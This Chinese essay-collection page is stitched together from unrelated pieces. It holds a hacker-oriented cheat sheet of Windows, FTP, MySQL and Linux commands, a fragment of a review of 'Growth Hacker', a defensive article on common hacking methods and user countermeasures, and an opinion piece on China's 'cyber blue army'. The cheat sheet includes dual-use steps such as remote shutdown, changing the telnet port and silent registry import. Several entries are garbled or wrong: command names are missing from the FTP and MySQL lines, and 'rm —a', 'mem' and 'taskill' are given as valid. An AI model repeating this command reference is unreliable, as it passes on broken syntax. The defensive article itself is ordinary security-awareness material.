ftp ip 端口 用于上传文件至服务器或进行文件操作,默认端口为21。bin指用二进制方式传送(可执行文件进);默认为ASCII格式传送(文本文件时)
route print 显示出IP路由,将主要显示网络地址Network addres,子网掩码Netmask,网关地址Gateway addres,接口地址Interface
arp 查看和处理ARP缓存,ARP是名字解析的意思,负责把一个IP解析成一个物理性的MAC地址。arp —a将显示出全部信息
start 程序名或命令 /max 或/min 新开一个新窗口并最大化(最小化)运行某程序或命令
mem 查看cpu使用情况
attrib 文件名(目录名) 查看某文件(目录)的属性
attrib 文件名 —A —R —S —H 或 +A +R +S +H 去掉(添加)某文件的 存档,只读,系统,隐藏 属性;用+则是添加为某属性
dir 查看文件,参数:/Q显示文件及目录属系统哪个用户,/T:C显示文件创建时间,/T:A显示文件上次被访问时间,/T:W上次被修改时间
date /t 、time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间,而不必输入新日期和时间
set 指定环境变量名称=要指派给变量的字符 设置环境变量
set 显示当前所有的环境变量
set p(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量
pause 暂停批处理程序,并显示出:请按任意键继续。。。。
if 在批处理程序中执行条件处理(更多说明见if命令及变量)
goto 标签 将cmd。exe导向到批处理程序中带标签的行(标签必须单独一行,且以冒号打头,例如:“:start”标签)
call 路径批处理文件名 从批处理程序中调用另一个批处理程序 (更多说明见call /?)
for 对一组文件中的每一个文件执行某个特定命令(更多说明见for命令及变量)
echo on或off 打开或关闭echo,仅用echo不加参数则显示当前echo设置
echo 信息 在屏幕上显示出信息
echo 信息 >>pass。txt 将“信息”保存到pass。txt文件中
findstr “Hello” aa。txt 在aa。txt文件中寻找字符串hello
find 文件名 查找某文件
title 标题名字 更改CMD窗口标题名字
color 颜色值 设置cmd控制台前景和背景颜色;0=黑、1=蓝、2=绿、3=浅绿、4=红、5=紫、6=黄、7=白、8=灰、9=淡蓝、A=淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白
prompt 名称 更改cmd。exe的显示的命令提示符(把C:、D:统一改为:EntSky )
print 文件名 打印文本文件
ver 在DOS窗口下显示版本信息
winver 弹出一个窗口显示版本信息(内存大小、系统版本、补丁版本、计算机名)
format 盘符 /FS:类型 格式化磁盘,类型:FAT、FAT32、NTFS ,例:Format D: /FS:NTFS
md 目录名 创建目录
replace 源文件 要替换文件的目录 替换文件
ren 原文件名 新文件名 重命名文件名
tree 以树形结构显示出目录,用参数—f 将列出第个文件夹中文件名称
type 文件名 显示文本文件的内容
more 文件名 逐屏显示输出文件
doskey 要锁定的命令=字符
doskey 要解锁命令= 为DOS提供的锁定命令(编辑命令行,重新调用win2k命令,并创建宏)。如:锁定dir命令:doskey dir=entsky (不能用doskey dir=dir);解锁:doskey dir=
taskmgr 调出任务管理器
chkdsk /F D: 检查磁盘D并显示状态报告;加参数/f并修复磁盘上的错误
tlntadmn telnt服务admn,键入tlntadmn选择3,再选择8,就可以更改telnet服务默认端口23为其它任何端口
exit 退出cmd。exe程序或目前,用参数/B则是退出当前批处理脚本而不是cmd。exe
path 路径可执行文件的文件名 为可执行文件设置一个路径。
cmd 启动一个win2K命令解释窗口。参数:/eff、/en 关闭、开启命令扩展;更我详细说明见cmd /?
regedit /s 注册表文件名 导入注册表;参数/S指安静模式导入,无任何提示;
regedit /e 注册表文件名 导出注册表
cacls 文件名 参数 显示或修改文件访问控制列表(ACL)——针对NTFS格式时。参数:/D 用户名:设定拒绝某用户访问;/P 用户名:perm 替换指定用户的访问权限;/G 用户名:perm 赋予指定用户访问权限;Perm 可以是: N 无,R 读取, W 写入, C 更改(写入),F 完全控制;例:cacls D: est。txt /D pub 设定d: est。txt拒绝pub用户访问。
cacls 文件名 查看文件的访问用户权限列表
REM 文本内容 在批处理文件中添加注解
netsh 查看或更改本地网络配置情况
IIS服务命令:
iisreset /reboot 重启win2k计算机(但有提示系统将重启信息出现)
iisreset /start或stop 启动(停止)所有Internet服务
iisreset /restart 停止然后重新启动所有Internet服务
iisreset /status 显示所有Internet服务状态
iisreset /enable或disable 在本地系统上启用(禁用)Internet服务的重新启动
iisreset /rebootonerror 当启动、停止或重新启动Internet服务时,若发生错误将重新开机
iisreset /noforce 若无法停止Internet服务,将不会强制终止Internet服务
iisreset /timeout Val在到达逾时间(秒)时,仍未停止Internet服务,若指定/rebootonerror参数,则电脑将会重新开机。预设值为重新启动20秒,停止60秒,重新开机0秒。
FTP 命令: (后面有详细说明内容)
ftp的命令行格式为:
ftp —v —d —i —n —g[主机名] —v 显示远程服务器的所有响应信息。
—d 使用调试方式。
—n 限制ftp的自动登录,即不使用。netrc文件。
—g 取消全局文件名。
help [命令] 或 ?[命令] 查看命令说明
bye 或 quit 终止主机FTP进程,并退出FTP管理方式。
pwd 列出当前远端主机目录
put 或 send 本地文件名 [上传到主机上的文件名] 将本地一个文件传送至远端主机中
get 或 recv [远程主机文件名] [下载到本地后的文件名] 从远端主机中传送至本地主机中
mget [remote—files] 从远端主机接收一批文件至本地主机
mput local—files 将本地主机中一批文件传送至远端主机
dir 或 ls [remote—directory] [local—file] 列出当前远端主机目录中的文件。如果有本地文件,就将结果写至本地文件
ascii 设定以ASCII方式传送文件(缺省值)
bin 或 image 设定以二进制方式传送文件
bell 每完成一次文件传送,报警提示
cdup 返回上一级目录
close 中断与远程服务器的ftp会话(与open对应)
open host[port] 建立指定ftp服务器连接,可指定连接端口
删除远端主机中的文件
m [remote—files] 删除一批文件
mkdir directory—name 在远端主机中建立目录
rename [from] [to] 改变远端主机中的文件名
rmdir directory—name 删除远端主机中的.目录
status 显示当前FTP的状态
system 显示远端主机系统类型
user user—name [password] [account] 重新以别的用户名登录远端主机
open host [port] 重新建立一个新的连接
prompt 交互提示模式
macdef 定义宏命令
lcd 改变当前本地主机的工作目录,如果缺省,就转到当前用户的HOME目录
chmod 改变远端主机的文件权限
case 当为ON时,用MGET命令拷贝的文件名到本地机器中,全部转换为小写字母
cd remote—dir 进入远程主机目录
cdup 进入远程主机目录的父目录
! 在本地机中执行交互shell,exit回到ftp环境,如!ls*。zip
MYSQL 命令:
mysql —h主机地址 —u用户名 —p密码 连接MYSQL;如果刚安装好MYSQL,超级用户root是没有密码的。
(例:mysql —h110。110。110。110 —Uroot —P123456
注:u与root可以不用加空格,其它也一样)
exit 退出MYSQL
mysqladmin —u用户名 —p旧密码 password 新密码 修改密码
grant select on 数据库。* to 用户名@登录主机 identified by “密码”; 增加新用户。(注意:和上面不同,下面的因为是MYSQL环境中的命令,所以后面都带一个分号作为命令结束符)
show databases; 显示数据库列表。刚开始时才两个数据库:mysql和test。mysql库很重要它里面有MYSQL的系统信息,我们改密码和新增用户,实际上就是用这个库进行操作。
use mysql;
show tables; 显示库中的数据表
describe 表名; 显示数据表的结构
create database 库名; 建库
use 库名;
create table 表名 (字段设定列表); 建表
drop database 库名;
表名; 删库和删表
from 表名; 将表中记录清空
select * from 表名; 显示表中的记录
mysqldump ——opt school>school。bbb 备份数据库:(命令在DOS的mysql in目录下执行);注释:将数据库school备份到school。bbb文件,school。bbb是一个文本文件,文件名任取,打开看看你会有新发现。
win系统下新增命令(实用部份):
shutdown /参数 关闭或重启本地或远程主机。
参数说明:/S 关闭主机,/R 重启主机, /T 数字 设定延时的时间,范围0~180秒之间, /A取消开机,/M //IP 指定的远程主机。
例:shutdown /r /t 0 立即重启本地主机(无延时)
taskill /参数 进程名或进程的pid 终止一个或多个任务和进程。
参数说明:/PID 要终止进程的pid,可用tasklist命令获得各进程的pid,/IM 要终止的进程的进程名,/F 强制终止进程,/T 终止指定的进程及他所启动的子进程。
tasklist 显示当前运行在本地和远程主机上的进程、服务、服务各进程的进程标识符(PID)。
参数说明:/M 列出当前进程加载的dll文件,/SVC 显示出每个进程对应的服务,无参数时就只列出当前的进程。
Linux系统下基本命令: 要区分大小写
uname 显示版本信息(同win2K的 ver)
dir 显示当前目录文件,ls —al 显示包括隐藏文件(同win2K的 dir)
pwd 查询当前所在的目录位置
cd cd 。。回到上一层目录,注意cd 与。。之间有空格。cd /返回到根目录。
cat 文件名 查看文件内容
cat >abc。txt 往abc。txt文件中写上内容。
more 文件名 以一页一页的方式显示一个文本文件。
cp 复制文件
mv 移动文件
rm 文件名 删除文件,rm —a 目录名删除目录及子目录
mkdir 目录名 建立目录
rmdir 删除子目录,目录内没有文档。
chmod 设定档案或目录的存取权限
grep 在档案中查找字符串
diff 档案文件比较
find 档案搜寻
date 现在的日期、时间
who 查询目前和你使用同一台机器的人以及Login时间地点
w 查询目前上机者的详细资料
whoami 查看自己的帐号名称
groups 查看某人的Group
passwd 更改密码
history 查看自己下过的命令
ps 显示进程状态
kill 停止某进程
gcc 黑客通常用它来编译C语言写的文件
su 权限转换为指定使用者
telnet IP telnet连接对方主机(同win2K),当出现bash$时就说明连接成功。
《增长黑客》读后感心得 篇6
看数据:数据分为业务数据,非业务数据,非业务数据需要进行埋点才能记录。通过数据分析,确定系统改进的方向。
团队中要有有人负责数据的分析,团队基于数据分析,提交自己的点子,挑出点子进行快速实验,然后再分析数据,找出前后的变化,好的点子保留和继续演进,不好的点子及时回退。从而形成闭环和持续演进。
试验一定要快速,要确定MVP并快速变现,变现时间越长,则风险越大,失败可能性越大。快速变现并快速成功,是最好的团队建设,可以消除矛盾,激发斗志。
一定要打破深井,用户与IT的深井,开发团队与运维团队,开发团队与技术平台的深井,只有这样才能更高效。
网络黑客攻击与用户防御策略研究 篇7
随着以Internet为代表的计算机信息网络技术的迅速发展和广泛应用, 互联网逐渐成为人们工作、学习、交友、购物等的重要平台。网络的营运已成为21世纪的新时尚。然而, 一种高技术、高智能犯罪形式——网络黑客攻击与入侵的出现和存在给网络系统与用户信息的安全带来严重的威胁与严峻的挑战, 并迅速成为互联网络犯罪最为常见的手段。据统计, 我国95%的与互联网相联的网络管理中心都遭到过境内外黑客的攻击或侵入, 其中银行、金融和证券机构成为了黑客攻击的重点。个人网络用户由于安全意识薄弱、防御水平较低, 也经常成为黑客入侵和攻击的对象。网络安全和黑客问题越来越受到人们的关注。加强计算机网络安全的教育和普及, 提高对网络安全重要性的认识, 增强防范意识, 强化防范措施, 切实增强用户对网络入侵的认识和自我防范能力, 是抵御和防范黑客攻击, 有效确保网络安全的基本途径。
1 认识网络黑客
网络“黑客 (Hacker) ”指的是网络的攻击者或非法侵入者。黑客攻击与入侵是指未经他人许可利用计算机网络非法侵入他人计算机, 窥探他人的资料信息, 破坏他人的网络程序或硬件系统的行为。它可以对信息所有人或用户造成严重损失, 甚至可能对国家安全带来严重后果, 具有严重的社会危害性。网络攻击与入侵已经成为一种最为常见的网络犯罪手段。
2 黑客攻击与入侵的手法分析
所谓知己知彼, 百战不殆, 对于广大网络用户来说, 了解黑客实施网络入侵的手段和原理是加强针对性、进行有效防范的前提和保证。黑客攻击的手段和方法很多, 其主要攻击方式有以下几类。
第一类是进行网络报文嗅探 (Sniffer) , 指入侵者通过网络监听等途径非法截获关键的系统信息, 如用户的账号和密码。一旦正确的账户信息被截取, 黑客即可侵入你的网络。更严重的问题是, 如果黑客获得了系统级的用户账号, 就可以对系统的关键文件进行修改, 如系统管理员的账号和密码、文件服务器的服务和权限列、注册表等, 同时还可以创建新的账户, 为以后随时侵入系统获取资源留下后门。
第二类是放置木马程序, 如特洛伊木马等, 这种木马程序是一种黑客软件程序, 它可直接侵入计算机系统的服务器端和用户端。它常被伪装成工具软件或游戏程序等, 诱使用户打开带有该程序的邮件附件或从网上直接下载。一旦用户打开这些邮件附件或执行这些程序之后, 它们就会像古特洛伊人在敌人城外留下藏满士兵的木马一样留在用户计算机中, 并在计算机系统中隐藏一个可在Windows启动时自动执行的程序。当用户连接Internet时, 此程序会自动向黑客报告用户主机的IP地址及预先设定的端口。黑客在获取这些信息后, 就可利用这个潜伏在用户计算机中的程序, 任意修改用户主机的参数设定、复制文件、窥视硬盘中的内容信息等, 从而达到控制目的。另外, 目前网络上流行很多种新的木马及其变种, 通过隐蔽手段隐藏不易察觉危险的文件或网页中, 诱使用户点击运行, 从而达到监听用户键盘、窃取用户重要的口令信息等, 通过在浙江省范围内的调研看, 很大一部分的涉网金融案件、私密信息被盗案件都与用户服务器或计算机内被放置这种木马软件有关。
第三类是IP欺骗。IP欺骗攻击指网络外部的黑客假冒受信主机, 如通过使用用户网络IP地址范围内的IP地址或用户信任的外部IP地址, 从而获得对特殊资源位置的访问权或截取用户账号和密码的一种入侵方式。
第四类是电子邮件炸弹。指将相同的信息反复不断地传给用户邮箱, 实现用垃圾邮件塞满用户邮箱以达到破坏其正常使用的目的。
第五类是拒绝服务和分布式拒绝服务 (DoS&DDoS) 。其主要目的是使网络和系统服务不能正常进行。通常采用耗尽网络、操作系统或应用程序有限的资源的方法来实现。
第六类是密码攻击。指通过反复试探、验证用户账号和密码来实现密码破解的方式, 又称为暴力攻击。一旦密码被攻破, 即可进一步侵入系统。目前比较典型的是黑客通过僵尸软件远程控制网络上的计算机, 形成僵尸网络, 黑客通过控制的僵尸肉机进行大规模的运算试探破解用户密码, 进而入侵系统。
第七类是病毒攻击 (Virus) 。许多系统都有这样那样的安全漏洞 (Bugs) 。黑客往往会利用这些系统漏洞或在传送邮件、下载程序中携带病毒的方式快速传播病毒程序, 如C I H、Worm、Red Code、Nimada、震荡波、冲击波、熊猫烧香等, 从而造成极大危害。另外, 利用许多公开化的新技术, 如H T M L规范、H T T P协议、X M L规范、S O A P协议等, 进行病毒传播逐渐成为新的病毒攻击方式。这些攻击利用网络传送有害的程序包括Java Applets和ActiveX控件, 并通过用户浏览器的调用来实现。
第八类是端口扫描入侵, 指利用Socket编程与目标主机的某些端口建立TCP连接, 进行传输协议的验证等, 从而侦知目标主机的扫描端口是否处于激活状态、主机提供了哪些服务台、提供的服务中是否含有某些缺陷等, 并利用扫描所得信息和缺陷实施入侵的方式。常见的扫描方式为Connect扫描和Fragmentation扫描。
3 网络攻击与入侵的有效防御
影响计算机网络安全的因素很多, 对个人上网用户来说, 抵御和防范网络入侵显得尤为重要。为了做好防范工作, 除了要提高认识、加强安全教育和法制教育、加强管理等以外, 采取一些安全技术措施, 熟练掌握一些安全防范技巧是进行用户自我防范的基本保证。作为网络用户, 应当从网络攻击的基本原理入手, 从安全防护和使用安全两个环节来抓好安全防范工作, 从而达到有效防范的目的。
3.1 采取切实可靠的安全防护措施
(1) 使用病毒防火墙, 及时更新杀毒软件
在个人计算机上安装一些防火墙软件, 如金山毒霸, 可实时监控并查杀病毒。同时, 用户要认识到任何防护环节都具有一定的安全时效, 即只有在一定时间内, 防护软件具有较高的安全防护能力。因此, 为了确保已安装的防火墙软件的有效性, 用户在使用时应注意及时对其升级, 以及时更新病毒库。
(2) 隐藏自己主机的IP地址
黑客实施攻击的第一步就是获得你的IP地址。隐藏IP地址可以达到很好的防护目的。可采取的方法有:使用代理服务器进行中转, 用户上网聊天、BBS等不会留下自己的IP;使用工具软件, 如Norton Internet Security来隐藏你主机的IP地址;避免在BBS和聊天室暴露个人信息。
(3) 切实做好端口防范
黑客经常会利用端口扫描来查找你的IP地址, 为有效阻止入侵, 一方面可以安装端口监视程序, 如Netwatch, 实时监视端口的安全;另一方面应当将不用的一些端口关闭。可采用Norton Internet Security关闭个人用户机上的HTTP服务端口 (80和443端口) , 因一般用户不需提供网页浏览服务;如果系统不要求提供SMTP和POP3服务, 则可关闭25和110端口, 其他一些不用的端口也可关闭。另外, 建议个人用户关闭139端口, 该端口实现了本机与其他Windows系统计算机的连接, 关闭它, 可防范绝大多数的攻击。可通过“网络”—“配置”—“TCP/IP”—“属性”—“绑定”—“Mcrosoft网络客户端”, 将此开关关闭即可。
(4) 关闭共享或设置密码, 以防信息被窃
建议个人上网用户关闭硬盘和文件夹共享, 通过“网络”—“文件和打印机共享”—“允许其他用户访问我的文件”, 将此开关关闭即可。如果确需共享, 则应对共享的文件夹设置只读属性与密码, 增强对文件信息的安全防护。
(5) 加强IE浏览器对网页的安全防护
IE浏览器是用户进行网页访问的主要工具, 同时也成为黑客使用HTTP协议等实施入侵的一种重要途径。个人用户应通过对IE属性的设置来提高IE访问网页的安全性。具体措施有:
(1) 提高IE安全级别, 运行打开IE, 通过“工具”—“Internet选项”—“安全”—“Internet区域”, 将安全级别设置为“高”。
(2) 禁止ActiveX控件和JavaApplets的运行。由于有些包含恶意代码的ActiveX控件可被嵌入到HTML页面中, 并下载到浏览器端执行, 因此给客户机造成一定的安全威胁。许多病毒或蠕虫如Bubbleboy、KAK.worm等可生成Vbscript或JavaScript脚本程序在浏览器中执行, 因而在IE中禁止ActiveX控件及Java脚本等可避免此类病毒的侵入。可通过“工具”—“Internet选项”—“安全”—“自定义级别”, 在“安全设置”对话框中找到ActiveX控件相关的设置, 将其设为“禁用”或“提示”即可。
(3) 禁止Cookie。由于许多网站利用Cookie记录网上客户的浏览行为及电子邮件地址等信息, 为确保个人隐私信息的安全, 可将其禁用。可通过“工具”—“Internet选项”—“安全”—“自定义级别”, 在“安全设置”对话框中找到Cookie相关的设置, 将其设为“禁用”或“提示”即可。
(4) 将黑客网站列入黑名单, 将其拒之门外。可通过“工具”—“Internet选项”—“内容”—“分级审查”—“启用”, 在“分级审查”对话框的“许可站点”下输入黑客网站地址, 并设为“从不”即可。
(5) 及时安装补丁程序, 以强壮IE。IE和Outlook的漏洞被大多数网络病毒利用来传播病毒。因此, 应及时利用微软网站提供的补丁程序来消除这些漏洞, 提高IE自身的防侵入能力。
(6) 上网前备份注册表
许多黑客攻击会对系统注册表进行修改, 造成系统的破坏。在上网前做一个注册表备份, 以防万一。
3.2 切实保障用户使用的安全
(1) 注意电子邮件的使用安全
为保障电子邮件的使用安全, 应从以下几个方面采取措施进行安全防范。
第一, 选择安全可靠的邮件服务。
目前, Internet上提供的E-mail账户大都是免费账户, 这些免费的服务不提供任何有效的安全保障, 有的免费邮件服务器常会导致邮件受损。因此, 最好选择收费邮件账户。
第二, 确保邮件账号的安全防范。
首先要保护好邮箱的密码。在WEB方式下, 不要使用IE的自动完成功能, 不要使用保存密码功能以图省事。入网账号与口令应重点保护。设置的口令不要太简单, 最好采用8位数, 并且数字与字母相间, 中间放置若干允许的不常用符号。其次, 对于较重要的邮件地址要注意保密, 不在网上随意显示。
第三, 对重要邮件信息加密处理。
可使用某些工具如A-LOCK, 在发送邮件之前对内容进行加密。对方收到加密信件后必须采用A-LOCK解密后方可阅读。可防止邮件被他人截获而泄密。
第四, 小心提防和防止邮件炸弹。
可通过以下三种途径来排除电子邮件炸弹 (E-mail BOMB) 。一是对不明电子邮件进行过滤。尽量不要开启可疑的电子邮件。如若怀疑有电子邮件炸弹, 可用邮件程序 (如Foxmail) 的远程邮箱管理功能来过滤信件。在进行邮箱的远程管理时, 仔细检查邮件头信息, 若发现有来历不明的信件或符合邮件炸弹特征的信件, 可直接将其从邮件服务器上删除。二是先杀毒后使用。如果邮件带有附件, 不管是谁发来的, 也不管其内容是什么 (即使是文档, 也可能成为病毒的潜伏场所, 如Melissa病毒) , 为安全考虑, 都不要立即执行, 可以先存盘, 并用杀毒软件进行检查。另外, 还有些邮件附件是某些入侵者以网站名义发来的木马程序。因此, 防止邮件入侵, 应掌握一个原则:凡是接收到的任何程序或文档都应先用杀毒工具检查, 然后再使用。三是可考虑使用转信功能。用户一般会有多个E-mail地址。在日常使用时, 最好再申请一容量较大的邮箱作为收信信箱, 对于其它信箱则设置转信到该大信箱, 这样可以很好保护用户信箱免受电子邮件轰炸。
(2) 确保软件下载的使用安全
Internet上网络软件已非常丰富, 为广大网络用户使用各种软件提供极大的方便, 但它们同时又经常会被网络入侵者们利用作为传播和扩散病毒、木马程序等的重要载体。因此, 网络用户在进行软件下载和使用时, 应提高警惕, 注意防范。
第一, 软件下载应尽量考虑客流大的专业站点。
大型的专业站点, 资金相对雄厚, 技术比较成熟, 水平相对较高, 信誉较佳, 一般都有专人维护, 安全性能好, 因此所提供的下载软件相对较可靠。相反, 小型个人站点所提供的软件出现安全问题的机率相对就较高。
第二, 软件下载以后应先杀毒再使用。
下载的不论是应用程序还是文档, 都应先查杀毒再运行或打开。同时, 杀毒软件应经常升级更新, 保持最新版本。
第三, 尽量避免下载可疑软件。
对于网上某些可疑的、诱惑性动机比较明显的软件或信息, 一般不建议下载, 以防染上“木马”程序。
4 结束语
随着Internet的广泛应用, 网络入侵等网络安全威胁依然存在, 甚至还会有更新的发展, 要求广大网络用户提高对网络安全的认识, 加深对网络入侵等网络安全威胁的理解, 强化对安全防范基本知识和技能学习, 是非常必要的。总之, 只有时刻提高警惕, 防患于未然, 这样才能摆脱网络安全问题所带来的烦恼, 充分享受Internet的乐趣。
摘要:网络黑客已成为当前互联网络安全的巨大隐患。增强网络安全意识, 逐步深入对网络黑客的认识, 研究总结网络黑客的攻防策略, 掌握基本的防御技能, 已成为每个网络用户抵御黑客攻击和入侵、确保安全使用的最积极有效的方式与途径。基于这个目的, 本文对近年来网络黑客攻击和入侵的基本手法和机理进行了分析, 并对网络用户如何进行有效防御策略进行了分析研究。
关键词:网络黑客,攻击手段:有效防御
参考文献
[1]凌雨欣, 常红主编.网络安全技术与反黑客.冶金工业出版社.2001.
[2]梅珊, 王腾宇, 冯晓聪编著.Internet安全防范实例.中国电力出版社.2002.
[3]韩东海, 王超, 李群编著.入侵检测系统实例剖析.清华大学出版社.2002.
[4]Donn B.Parker编著.Fighting Computer Crime.电子工业出版社.1999.
[5]戴银涛, 赵蓓, 胡昌振.基于安全可靠的观点建立网络安全系统.计算机安全.2002.
网络蓝军并非黑客 篇8
上,国防部发言人耿雁生证实中国已组建“网络蓝军”,以捍卫军队网络安全。一石激起千层浪,中国的“网络蓝军”成为上至专家下至军迷讨论的热点话题。
“战争是充满不确定性的领域。战争中行动所依据的情况有四分之三好像隐藏在云雾里一样,是或多或少不确实的。”名著《战争论》的作者克劳塞维茨曾对现代战争做过如此阐释。“现代战争迷雾”让各国十分热衷推动信息技术特别是网络技术在战争中的应用。
网络部队其实早已有之。美国早在1991年的海湾战争中就通过释放电脑病毒摧毁了伊拉克的防空系统。此后的科索沃战争、伊拉克战争,美国的网络部队也发挥了重要作用。除美国外,英国、俄罗斯、日本、印度等国也建立了自己的网络安全保障队伍。
西方国家习惯将攻击部队称为红方,是颇具形态色彩的一种说法。“红方”、“蓝方”并不代表特定的意义,只是用来区别双方的标识。国防部提出的网络蓝军也没有什么特别的指代意义。
中国“网络蓝军”只是部队训练时的代称,而该训练是应对网络攻击的预防措施。与西方国家的网络战部队相比,我国的网络蓝军目前处于初级阶段。与其说是一种有建制、成规模的网络战部队,不如说是我国军方开展的一种网上对抗训练模式。
网络蓝军绝非黑客。“敲诈者”、“熊猫烧香”、“磁碟机”……各种电脑病毒威胁着中国的网络安全。中国现在对网络的依赖性越来越大,但中国没有一台根服务器。此外,中国网络的硬件,包括很多软件的生产商基本上都是美国。从这个意义上来说,中国只是计算机的“用户”,网络安全很脆弱。在这样的环境下,中国组建一支保障网络安全的部队是十分有必要的。但在中国军方证实“网络蓝军”存在的消息后,西方媒体却质疑中国网络蓝军有“黑客”之嫌。
中国的网络蓝军与黑客有着本质的区别。首先从正当性上来说,网络蓝军是由国家有关部门建立的,是合法和正当的,而黑客则多是以私人身份进行活动的,是不合法和不正当的;其次从意图上来说,中国的网络蓝军承担着保障国家网络安全的光荣使命,而黑客则是借助电脑病毒肆意攻击他人电脑。中国的网络蓝军与黑客毫无可比之处。
现代化战争打的是科技,是网络,而不仅仅是战士上战场,加强国防网络建设是维护国家安全的又一新要求,应加大对网络国防的重视。虽然我们不希望打仗,但需要时刻准备着。
“知己知彼,百战不殆”,这是流传至今的战争法则。在信息技术高速发展的今天,我们需要有效地捍卫我国的信息网络安全,而这恰恰需要依仗一支出色的“网络蓝军”。
组建网络蓝军是十分必要和有意义的。但相比于西方的网络部队,中国的网络蓝军还存在着诸多问题,诸如:中国网络战的理念、网络战部队的职能、使命和条令亟须健全,网络化作战设施也待完善,国际立法需进一步完善等。